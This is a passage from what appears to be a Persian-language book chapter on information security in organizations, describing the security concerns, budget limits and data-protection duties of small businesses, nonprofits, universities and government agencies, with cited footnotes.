ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﺑﻪ ﺩﻭ ﺣﻮﺯﺓ
ﺍﺻﻠﻲ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﺩ :ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺟﺎﺳﻮﺳﻬﺎ ﻳـﺎ ﻣﻬـﺎﺟﻤﻴﻦ ﺳـﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ
٥
ﻣﺸﺘﺮﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ.
۴
۵
ﺗﻌﺮﻳﻒ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ
ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ،ﻳﻚ ﻣﺎﻟﻚ ﺑﺘﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺟﻨﺒـﻪﻫـﺎﻱ
ﻳﻚ ﺗﺠﺎﺭﺕ ﺳﻨﺘﻲ ﻣﺜﻞ ﻣﺰﺭﻋﻪﺩﺍﺭﻱ ﻳﺎ ﺧﻮﺍﺭﺑﺎﺭ ﻓﺮﻭﺷﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣـﻲ-
ﺩﻫﺪ؛ ﻳﻌﻨﻲ ﻣﺎﻟﻚ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪ ﺁﻥ ﺗﺠـﺎﺭﺕ ﻣـﻲﺑﺎﺷـﺪ .ﺩﺭ ﺗﺠﺎﺭﺗﻬـﺎﻱ
ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻨﺪ ﺻﺪ ﻧﻔﺮ ﺗﻨﻬﺎ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ
ﻳﺎ ﻣﺤﺼﻮﻻﺕ ﻓﻨﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ .ﺩﺭ ﺩﻧﻴﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ،ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑـﺎ
ﺗﻜﻴﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ
ﻭ ﻣﺘﻮﺳﻂ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﮔﺮﻭﻫﻬﺎﻱ ﺳـﺮﻣﺎﻳﻪ-
ﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺁﻧﻬﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷـﻮﺩ ،ﺑـﺴﺮﻋﺖ ﺑـﺰﺭﮒ ﺷـﻮﻧﺪ ،ﻭ ﻳـﺎ
ﺗﻮﺳﻂ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﺧﺮﻳﺪﺍﺭﻱ ﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ
ﻭ ﻣﺘﻮﺳﻂ ﺑﺴﻴﺎﺭ ﻣﻮﻓﻖ ،ﺍﻭﺭﺍﻕ ﺳﻬﺎﻡ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨـﺪ ﻭ ﺧﻮﺩﺷـﺎﻥ ﺑـﻪ
ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﻋﻤﻮﻣﻲ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ.
ﺩﺭ ﺣﺎﻟــﺖ ﻛﻠــﻲ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺩﺭ ﺷــﺮﻛﺘﻬﺎﻱ ﺑــﺰﺭﮒ ﻳــﺎ
ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺤﺼﻮﻻﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ ﻣـﻲﻛﻨﻨـﺪ -
ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻮﺁﻭﺭﻱ ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺯﺩﻳـﺪﻩ
ﺷﻮﺩ -ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﻣﺤﺴﻮﺏ ﻣـﻲﺷـﻮﺩ .ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ
ﺗﺠﺎﺭﺕ ﻣﺸﻐﻮﻟﻨﺪ ،ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱﺗﺮﻱ ﺍﺯ ﺟﺎﺳﻮﺳـﻲ ﺍﺳـﺖ،
ﻫﺮﭼﻨﺪ ﺁﺛﺎﺭ ﻫﺮ ﺩﻭ ﻣﺸﺎﺑﻪ ﺍﺳﺖ .ﺑﻄﻮﺭ ﺧﺎﺹ ﻫﺮ ﺷﺮﻛﺖ ﺑﺎﻳـﺪ ﺳـﻮﺍﺑﻖ
ﺣــﺴﺎﺑﺪﺍﺭﻱ ،ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ ،ﻭ ﺍﻃﻼﻋــﺎﺕ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻛــﺎﺭﺕ
ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺘﻴﺎﺑﻲ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ.
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ
ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﻪ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ
ﺭﻭﻱ ﺑﺎﺯﺍﺭ ،ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﺟﻮﺍﻣﻊ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﻫﻤﻜـﺎﺭ ،ﻭ ﺑﺪﺳـﺖ
ﺁﻭﺭﺩﻥ ﺷﻬﺮﺕ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ .ﺳﻴـﺴﺘﻤﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ
ﻻ ﺑﺪﻟﻴﻞ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ
ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ ﻭ ﻣﻌﻤﻮ ﹰ
ﺑﻮﺩﺟﻪ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺍﺯ ﻛﻴﻔﻴﺖ ﭘـﺎﻳﻴﻨﺘﺮﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﻧـﺴﺒﺖ ﺑـﻪ
ﺑﺎﺷﻨﺪ .ﺑﻌﻼﻭﻩ ﻣﻌﻤـﻮ ﹰ
ﻛﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺩﺍﺭﻧﺪ ﻭ ﻟﺬﺍ ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺧـﺪﻣﺎﺕ ﻣـﺪﺍﻭﻡ ﺑـﻪ
ﻣﺸﺘﺮﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻫﺪﺍﻛﻨﻨـﺪﮔﺎﻥ ﻛﻤﻜﻬـﺎﻱ ﻣـﺎﻟﻲ،
ﻧﺎﻇﺮﻳﻦ ،ﻭ ﻣﺆﺳﺴﺎﺕ ﻫﻤﻜﺎﺭ ﺧﻮﺩ ﻳﻚ ﻭﺟﻬﺔ ﻣﺜﺒﺖ ﺍﺯ ﻭﺿـﻌﻴﺖ
ﻭ ﻓﻌﺎﻟﻴﺖ ﻣﺆﺳﺴﻪ ﺑﻪ ﺗﺼﻮﻳﺮ ﺑﻜﺸﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣـﺸﻜﻼﺗﻲ
ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ.
ﺩﺍﻧﺸﮕﺎﻫﻬﺎ
ﻫﻤﺎﻧﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ،ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻧﻴـﺰ
ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﻮﺩﺟﻪﺍﻱ ،ﺷﺒﻜﻪﻫﺎﻱ ﻫﺰﻳﻨـﻪﺑـﺮ ،ﻭ
ﺩﺍﻣﻨﺔ ﻭﺳﻴﻌﻲ ﺍﺯ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻓﻨﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺑﺎ ﻳﻜﺴﺮﻱ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﺭﻭﺑـﺮﻭ ﺑﺎﺷـﻨﺪ؛ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ
ﻼ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﺮﺍﻱ ﭘﺮ ﻛﺮﺩﻥ ﺍﻭﻗﺎﺕ ﻓﺮﺍﻏﺖ ﺧـﻮﺩ
ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺜ ﹰ
ﺑﺨﻮﺍﻫﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﺄﺳﻴﺴﺎﺕ ﺩﺍﻧﺸﮕﺎﻩ ﻧﻔﻮﺫ ﻛﻨﻨـﺪ! ﻋـﻼﻭﻩ ﺑـﺮ
ﺍﻳﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭﺍﺣـﺪﻱ ﻋﻤـﻞ
ﻛﻨﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻠﺰﻡ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﻣﻘـﺮﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻨﺪ .ﺩﺭ
ﻣﺤﻴﻂ ﺩﺍﻧـﺸﮕﺎﻩ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ
ﺍﻫﻤﻴﺖ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﻬﻤﻲ ﺍﺯ ﻗﺒﻴﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ،ﺳﻮﺍﺑﻖ ﭘﺰﺷـﻜﻲ ﻭ ﺍﺳـﻨﺎﺩ
ﺁﻣﻮﺯﺷﻲ ﺍﺳﺖ .ﻣﻬﺎﺟﻤﻴﻦ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺭﺍ
ﺑﺪﺯﺩﻧﺪ ،ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ،ﻳﺎ ﺍﺯ ﺑـﻴﻦ ﺑﺒﺮﻧـﺪ؛ ﻭ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ ﺍﻋﺘﺒـﺎﺭ
ﺩﺍﻧﺸﮕﺎﻩ ﺁﺳﻴﺐ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ.
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳـﺎﺱ ﻛـﺎﺭﺁﻳﻲ ،ﺳـﻬﻮﻟﺖ ﺍﺳـﺘﻔﺎﺩﻩ ،ﻭ ﻗﺎﺑﻠﻴـﺖ
ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ
ﮔﻴــﺮﺩ .ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﺑﻄــﻮﺭ ﻛﻠــﻲ ﺩﺭ ﺑﺎﻓﺘﻬــﺎﻱ ﺩﻭﻟﺘــﻲ ﻣــﺴﺌﻠﻪ
ﺳــﻮﺩﺁﻭﺭﻱ ﻣﻄــﺮﺡ ﻧﻴــﺴﺖ ،ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﻣــﺸﺎﺑﻪ ﻣﺆﺳــﺴﺎﺕ
ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﻭﻱ ﺑﻮﺩﺟﻪ ﻛﻨﺘﺮﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
ﺗﻮﺍﻧــﺎﻳﻲ ﺳــﺎﺯﻣﺎﻥ ﺩﺭ ﺗﻬﻴــﺔ ﺟﺪﻳــﺪﺗﺮﻳﻦ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ
١٢٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ .ﻫﻤﺰﻣـﺎﻥ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺮ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻧﻴﺰ ﺗﻤﺮﻛﺰ ﻛﻨﻨﺪ ،ﭼﺮﺍﻛﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫﺎﻳـﺸﺎﻥ
ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻓـﺮﺍﺩ ﺍﺳـﺖ؛ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ
ﻗﺒﻴﻞ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻭ ﺳﻮﺍﺑﻖ ﭘﺰﺷﻜﻲ ،ﺟﻨﺎﻳﻲ ،ﻭ ﻣﺎﻟﻴﺎﺗﻲ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ ﻧﻴـﺰ
ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺍﺳـﺖ ﻭ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻨـﺴﻮﺥ،
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻧﺎﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻱ ﻛﻪ ﻓﺎﻗﺪ
ﺷﺎﻳﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺭﻧﺞ
ﻣﻲﺑﺮﺩ .ﻫﻤﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ،
ﺩﻭﻟﺖ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﻪ ﺗﺼﻮﻳﺮ ﻋﻤـﻮﻣﻲ ﺍﻳﺠﺎﺩﺷـﺪﻩ ﺍﺯ ﺧـﻮﺩ ﭘـﺲ ﺍﺯ
ﺧﺒﺮﻱ ﻭ ﺭﺳﺎﻧﻪﺍﻱ ﺷﺪﻥ ﻫﺮ ﻧﻔﻮﺫ ﻳﺎ ﺭﺧﺪﺍﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴﺖ
ﺩﻫﺪ.
٦UNDPﺩﺭ ﮔﺰﺍﺭﺵ ﺍﺧﻴـﺮ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻭﺿـﻌﻴﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﻃـﺮﺡ ﻛﻠـﻲ ﺑﻌـﻀﻲ
ﭼﺎﻟﺸﻬﺎﻳﻲ ﻛﻪ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻋﺼﺮ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ
ﻫﺴﺘﻨﺪ ﭘﺮﺩﺍﺧﺖ ٧.ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭼﻨﺪ ﺳﺮﻱ ﮔﺰﺍﺭﺵ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ
ﺗﻮﺳﻌﻪ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ ٨.ﺍﮔﺮﭼـﻪ
ﺗﺠﺮﺑﻴﺎﺕ ﻓﻨﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺟﻬـﺎﻥ ﺻـﻨﻌﺘﻲ ﺍﺯ ﺑﻌـﻀﻲ ﺟﻬـﺎﺕ
ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ )ﻣﻘﻴﺎﺱ ،ﻫﺰﻳﻨﻪﻫﺎ ،ﻭ ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﻛﻨـﺎﻥ( ،ﺍﻣﺎ ﺍﺯ
ﻧﻘﺎﻁ ﻗﺪﺭﺕ ﻭ ﺿﻌﻒ ﺁﻧﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﻲﺗﻮﺍﻥ ﺩﺭﺳﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﮔﺮﻓﺖ .ﺗﻌﺪﺍﺩ ﻣﺆﺳﺴﺎﺕ ﺑﺰﺭﮒ ﻛﻤﺘﺮ
ﺍﺳﺖ ﻭ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﻭﻳـﮋﻩ ﻭ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭﺳـﻴﻌﺘﺮﻱ
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﻣﻴﺎﻥ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻌﻨـﻮﺍﻥ
ﻣــﺴﺌﻮﻻﻥ ﻣﺮﺍﻛــﺰ ﻣﺨــﺎﺭﺝ ،ﻣــﺪﻳﺮﺍﻥ ﺍﺭﺷــﺪ ﻣــﺎﻟﻲ ﺑﻌﻨــﻮﺍﻥ
ﻛﻨﺘﺮﻝﻛﻨﻨﺪﮔﺎﻥ ﻫﺰﻳﻨﻪ ،ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺳﺎﺯﻣﺎﻥ )ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ
٩
ﺍﻃﻼﻋﺎﺕ ،ﻓﺮﻭﺵ ﻭ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ،ﻭ ﻣﺤـﺼﻮﻻﺕ( ﺗﻨـﺸﻬﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
United Nations Development Program
۷
ﺭﺟﻮﻉ ﻛﻨﻴﺪ ﺑﻪ ﮔﺰﺍﺭﺵ ﺗﻮﺳﻌﺔ ﺍﻧﺴﺎﻧﻲ ﺳﺎﻝ :۲۰۰۱
"Making New Technologies Work for Human
)Development" (UNDP: NY, 2001
۸
ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻣﻨﺎﺑﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﭘـﺮﻭﮊﻩﻫـﺎﻱ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺆﺳـﺴﺔ ﺭﺍﻫﺒـﺮﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )(ITGI
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.worldbank.com
http://www.itgi.org
۹
ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻨﻲ ﺑﺰﺭﮔﺘﺮ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺎﺯﻩﻛـﺎﺭﻱ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ
ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺴﺮﻋﺖ ﺭﺷﺪ ﻛﻨﻨﺪ ،ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ
6
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻨﺎﺑﻊ ﻛﻤﺘﺮﻱ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ،
ﺳﺎﺧﺘﺎﺭ ﻣﺴﻄﺢﺗﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ،ﻭ ﺍﻋﺘﻤﺎﺩ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﭘﺎﻳﮕﺎﻩ
ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺍﺭﻧــﺪ .ﺩﺭ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑـﺰﺭﮒ ،ﺷـﻔﺎﻓﺘﺮ
ﺑﺎﺷــﻨﺪ ﻭ ﻟــﺬﺍ ﺩﺭ ﭼﻨــﻴﻦ ﺳــﺎﺧﺘﺎﺭﻱ ﻛــﻪ ﺩﺭ ﺁﻥ ﺍﻳــﻦ ﻣﻘــﺪﺍﺭ ﺍﺯ
ﺍﻃﻼﻋــﺎﺕ ﺷــﺮﻛﺖ ﺑــﺮﺍﻱ ﻫﻤــﺔ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺭ ﺩﺳــﺘﺮﺱ ﺍﺳــﺖ
ﻲ ﺫﺍﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ
ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﺪﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ
ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻳﺎ ﻣﺸﺎﻭﺭ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﻮﻳﺘﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺷـﺮﻛﺖ
ﺍﺳﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﻪ ﺩﺭ ﻟﺒـﺔ
ﻓﻨﺎﻭﺭﻱ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨـﺪ ﺍﻳـﻦ ﺧﻄـﺮ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ
ﻧﻮﺁﻭﺭﻳﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺯ ﺳﺮﻗﺖ ﻳﺎ ﺗﺨﺮﻳﺐ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺍﻳـﻦ ﻣـﺸﻜﻼﺕ ،ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ
